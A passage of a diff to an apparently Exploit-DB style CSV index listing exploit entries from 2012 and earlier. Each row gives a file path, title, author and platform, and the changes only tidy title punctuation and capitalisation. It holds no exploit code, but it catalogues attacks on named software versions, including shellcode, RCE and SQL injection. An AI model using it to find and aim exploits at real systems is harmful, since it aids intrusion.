Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 -18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 +18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,metasploit,windows,remote,0 18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 Profile",2012-02-29,metasploit,windows,remote,0 18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone Persistent Cross Site Scripting Vulnerability",2012-02-29,"Narendra Shinde",hardware,webapps,0 @@ -16027,7 +16027,7 @@ id,file,description,date,author,platform,type,port 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (msf)",2012-03-04,metasploit,windows,remote,0 18558,platforms/php/webapps/18558.txt,"deV!L`z Clanportal Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0 -18559,platforms/php/webapps/18559.txt,"AneCMS v.2e2c583 LFI exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 +18559,platforms/php/webapps/18559.txt,"AneCMS v.2e2c583 LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 18563,platforms/php/webapps/18563.txt,"forkcms 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 @@ -16039,7 +16039,7 @@ id,file,description,date,author,platform,type,port 18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 'cprt' Overflow""",2012-03-08,metasploit,windows,remote,0 18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload Vulnerability",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 18575,platforms/php/webapps/18575.txt,"RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 -18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 +18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal Local File Inclusion Vulnerability",2012-03-12,TMT,php,webapps,0 @@ -16047,14 +16047,14 @@ id,file,description,date,author,platform,type,port 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux x86_64 - add user with passwd (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 18587,platforms/windows/dos/18587.py,"Network Instrument Observer SNMP SetRequest Denial of Service Vulnerability",2012-03-12,"Francis Provencher",windows,dos,0 -18589,platforms/php/webapps/18589.txt,"Acal calendar 2.2.6 CSRF Vulnerability",2012-03-12,"Number 7",php,webapps,0 -18590,platforms/php/webapps/18590.txt,"PBLang local file include vulnerability",2012-03-13,"Number 7",php,webapps,0 +18589,platforms/php/webapps/18589.txt,"Acal calendar 2.2.6 - CSRF Vulnerability",2012-03-12,"Number 7",php,webapps,0 +18590,platforms/php/webapps/18590.txt,"PBLang local file include Vulnerability",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery SQL Injection Exploit",2012-03-13,-DownFall,php,webapps,0 18592,platforms/php/webapps/18592.txt,"4images - Image Gallery Management System - [CSRF] Change mail user or admin",2012-03-13,"Dmar al3noOoz",php,webapps,0 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -18597,platforms/hardware/webapps/18597.txt,"Sitecom WLM-2501 CSRF Vulnerabilities",2012-03-14,"Ivano Binetti",hardware,webapps,0 +18597,platforms/hardware/webapps/18597.txt,"Sitecom WLM-2501 - CSRF Vulnerabilities",2012-03-14,"Ivano Binetti",hardware,webapps,0 18598,platforms/php/webapps/18598.txt,"Encaps PHP Gallery SQL Injection",2012-03-14,"Daniel Godoy",php,webapps,0 18599,platforms/php/webapps/18599.txt,"asaanCart XSS/LFI Vulnerabilities",2012-03-14,"Number 7",php,webapps,0 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 @@ -16090,8 +16090,8 @@ id,file,description,date,author,platform,type,port 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk ActiveX BackImage Vulnerability",2012-03-21,metasploit,windows,remote,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow Vulnerability",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 -18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 CSRF Vulnerability",2012-03-21,iqzer0,hardware,webapps,0 -18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 Remote SQL Injection and XSS Vulnerability",2012-03-21,LiquidWorm,php,webapps,0 +18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - CSRF Vulnerability",2012-03-21,iqzer0,hardware,webapps,0 +18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - Remote SQL Injection and XSS Vulnerability",2012-03-21,LiquidWorm,php,webapps,0 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection Vulnerability",2012-03-22,rgod,windows,remote,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability",2012-03-22,rgod,windows,dos,0 18642,platforms/windows/remote/18642.rb,"Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,metasploit,windows,remote,0 @@ -16103,18 +16103,18 @@ id,file,description,date,author,platform,type,port 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0, 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 -18652,platforms/php/webapps/18652.txt,"Wolfcms <= 0.75 Multiple Vulnerabilities (CSRF - XSS)",2012-03-23,"Ivano Binetti",php,webapps,0 +18652,platforms/php/webapps/18652.txt,"Wolfcms <= 0.75 - Multiple Vulnerabilities (CSRF - XSS)",2012-03-23,"Ivano Binetti",php,webapps,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow""",2012-03-24,metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0 -18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 +18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server DoS PoC",2012-03-25,ls,multiple,dos,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",2012-03-26,metasploit,windows,remote,0 -18667,platforms/php/webapps/18667.html,"Family CMS 2.9 and earlier multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 +18667,platforms/php/webapps/18667.html,"Family CMS <= 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 18668,platforms/php/webapps/18668.txt,"vBshop Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - Remote SQL Injection",2012-03-28,ZeTH,php,webapps,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit",2012-03-28,"Stefan Schurtz",windows,dos,0 @@ -16128,16 +16128,16 @@ id,file,description,date,author,platform,type,port 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow Vulnerability",2012-03-30,Vulnerability-Lab,windows,local,0 18682,platforms/php/webapps/18682.txt,"ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities",2012-03-30,"SecPod Research",php,webapps,0 18683,platforms/windows/remote/18683.py,"MailMax <= 4.6 - POP3 ""USER"" Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 -18685,platforms/php/webapps/18685.txt,"dalbum 144 build 174 and earlier CSRF Vulnerabilities",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 +18685,platforms/php/webapps/18685.txt,"dalbum <= 144 build 174 - CSRF Vulnerabilities",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 18686,platforms/php/webapps/18686.txt,"SyndeoCMS <= 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 -18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 [WN]KT KickTipp 3.1 remote SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 +18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 [WN]KT KickTipp 3.1 - Remote SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 -18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 +18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 - CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow',",2012-04-04,metasploit,windows,remote,0 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0 @@ -16156,7 +16156,7 @@ id,file,description,date,author,platform,type,port 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 -18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal vulnerability",2012-04-08,modpr0be,windows,remote,0 +18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal Vulnerability",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 Playlist File (M3U/PLS/LST) DoS Exploit",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro <= 1.4.0 - CSRF Add Admin Vulnerability",2012-04-08,Dr.NaNo,php,webapps,0 18722,platforms/cgi/webapps/18722.txt,"ZTE Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 @@ -16165,8 +16165,8 @@ id,file,description,date,author,platform,type,port 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",2012-04-10,metasploit,windows,remote,0 -18728,platforms/php/webapps/18728.txt,"joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 -18729,platforms/php/webapps/18729.txt,"joomla component (com_bearleague) SQL injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 +18728,platforms/php/webapps/18728.txt,"joomla component The Estate Agent (com_estateagent) SQL Injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 +18729,platforms/php/webapps/18729.txt,"joomla component (com_bearleague) SQL Injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 18730,platforms/multiple/remote/18730.rb,"Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",2012-04-11,metasploit,multiple,remote,0 18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection Vulnerability",2012-04-12,"hordcode security",php,webapps,0 18733,platforms/linux/local/18733.py,"wicd Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0 @@ -16176,13 +16176,13 @@ id,file,description,date,author,platform,type,port 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilites",2012-04-13,shpendk,php,webapps,0 18738,platforms/php/remote/18738.rb,"V-CMS PHP File Upload and Execute",2012-04-14,metasploit,php,remote,0 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 -18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) SQL injection Vulnerability",2012-04-15,xDarkSton3x,php,webapps,0 +18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) SQL Injection Vulnerability",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - CSRF Add Admin",2012-04-15,N3t.Crack3r,php,webapps,0 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus <= 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 Buffer Overflow",2012-04-18,metasploit,windows,local,0 -18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC exploit",2012-04-18,"Abhishek Lyall",osx,local,0 +18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 @@ -16226,7 +16226,7 @@ id,file,description,date,author,platform,type,port 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 - Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 18801,platforms/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 -18802,platforms/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 XSS Vulnerability",2012-04-30,Vulnerability-Lab,asp,webapps,0 +18802,platforms/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 - XSS Vulnerability",2012-04-30,Vulnerability-Lab,asp,webapps,0 18803,platforms/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 @@ -16245,7 +16245,7 @@ id,file,description,date,author,platform,type,port 18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 -18825,platforms/windows/remote/18825.rb,"VLC MMS Stream Handling Buffer Overflow",2012-05-03,metasploit,windows,remote,0 +18825,platforms/windows/remote/18825.rb,"VLC Mms Stream Handling Buffer Overflow",2012-05-03,metasploit,windows,remote,0 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit",2012-05-03,cikumel,windows,local,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Stored XSS Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0 @@ -16260,7 +16260,7 @@ id,file,description,date,author,platform,type,port 18844,platforms/php/webapps/18844.txt,"myCare2x CMS Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection Vulnerability",2012-05-07,loneferret,php,webapps,0 18847,platforms/windows/remote/18847.rb,"Firefox 7/8 (<= 8.0.1) - nsSVGValue Out-of-Bounds Access Vulnerability",2012-05-09,metasploit,windows,remote,0 -18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 CSRF Add Admin Exploit",2012-05-09,DennSpec,php,webapps,0 +18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - CSRF Add Admin Exploit",2012-05-09,DennSpec,php,webapps,0 18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 (.gpx) Crash PoC",2012-05-09,condis,windows,dos,0 18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid ActiveX Control RCE",2012-05-09,"Francis Provencher",windows,dos,0 18853,platforms/windows/dos/18853.txt,"SAP Netweaver Dispatcher Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 @@ -16285,7 +16285,7 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 -18882,platforms/php/webapps/18882.txt,"b2ePMS 1.0 Authentication Bypass Vulnerability",2012-05-15,"Jean Pascal Pereira",php,webapps,0 +18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 Authentication Bypass Vulnerability",2012-05-15,"Jean Pascal Pereira",php,webapps,0 18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 Backend XSS And SQLi Vulnerability",2012-05-08,"Stefan Schurtz",php,webapps,0 18885,platforms/linux/shellcode/18885.c,"linux/x86 execve(/bin/dash) 42 bytes",2012-05-16,X-h4ck,linux,shellcode,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - Multiple Vulnerabilities (CSRF - Persistent XSS)",2012-05-16,"Ivano Binetti",php,webapps,0 @@ -16294,7 +16294,7 @@ id,file,description,date,author,platform,type,port 18890,platforms/multiple/dos/18890.txt,"Trigerring Java Code from a SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18893,platforms/hardware/remote/18893.py,"HP VSA Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 -18894,platforms/windows/dos/18894.txt,"Windows XP Keyboard Layouts Pool Corruption LPE 0day PoC (post-MS12-034)",2012-05-18,Cr4sh,windows,dos,0 +18894,platforms/windows/dos/18894.txt,"Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034) (0day)",2012-05-18,Cr4sh,windows,dos,0 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,metasploit,multiple,remote,0 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,metasploit,windows,remote,0 18898,platforms/php/remote/18898.rb,"Active Collab ""chat module"" <= 2.3.8 - Remote PHP Code Injection Exploit",2012-05-19,metasploit,php,remote,0 @@ -16325,9 +16325,9 @@ id,file,description,date,author,platform,type,port 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0 18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 -18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal vulnerability",2012-05-27,metasploit,windows,remote,0 +18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal Vulnerability",2012-05-27,metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0 -18935,platforms/php/webapps/18935.txt,"b2ePMS 1.0 multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 +18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 .rtf FileOpen Crash",2012-05-28,shinnai,windows,dos,0 18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 @@ -16406,13 +16406,13 @@ id,file,description,date,author,platform,type,port 19029,platforms/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,php,webapps,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory Remote Code Execution",2012-06-10,metasploit,windows,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0 -19033,platforms/windows/remote/19033.txt,"microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 +19033,platforms/windows/remote/19033.txt,"Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling Vulnerability (MS12-005)",2012-06-11,metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0 -19039,platforms/bsd/remote/19039,"BSD 4.2 fingerd buffer overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0 +19039,platforms/bsd/remote/19039,"BSD 4.2 fingerd Buffer Overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0 19041,platforms/aix/dos/19041,"Digital Ultrix 4.0/4.1 /usr/bin/chroot Vulnerability",1991-05-01,anonymous,aix,dos,0 19042,platforms/solaris/dos/19042,"SunOS <= 4.1.1 /usr/release/bin/makeinstall Vulnerability",1999-11-23,anonymous,solaris,dos,0 @@ -16470,7 +16470,7 @@ id,file,description,date,author,platform,type,port 19100,platforms/php/webapps/19100.rb,"WordPress plugin Foxypress uploadify.php Arbitrary Code Execution",2012-06-13,metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3,TriTeal TED CDE 4.3,Sun Solaris <= 2.5.1 ToolTalk RPC Service Overflow Vulnerability (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3,TriTeal TED CDE 4.3,Sun Solaris <= 2.5.1 ToolTalk RPC Service Overflow Vulnerability (2)",1998-08-31,"NAI research team",unix,remote,0 -19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 +19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34,ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1,SCO Unixware <= 7.1.1,SGI IRIX <= 5.3,Sun Solaris <= 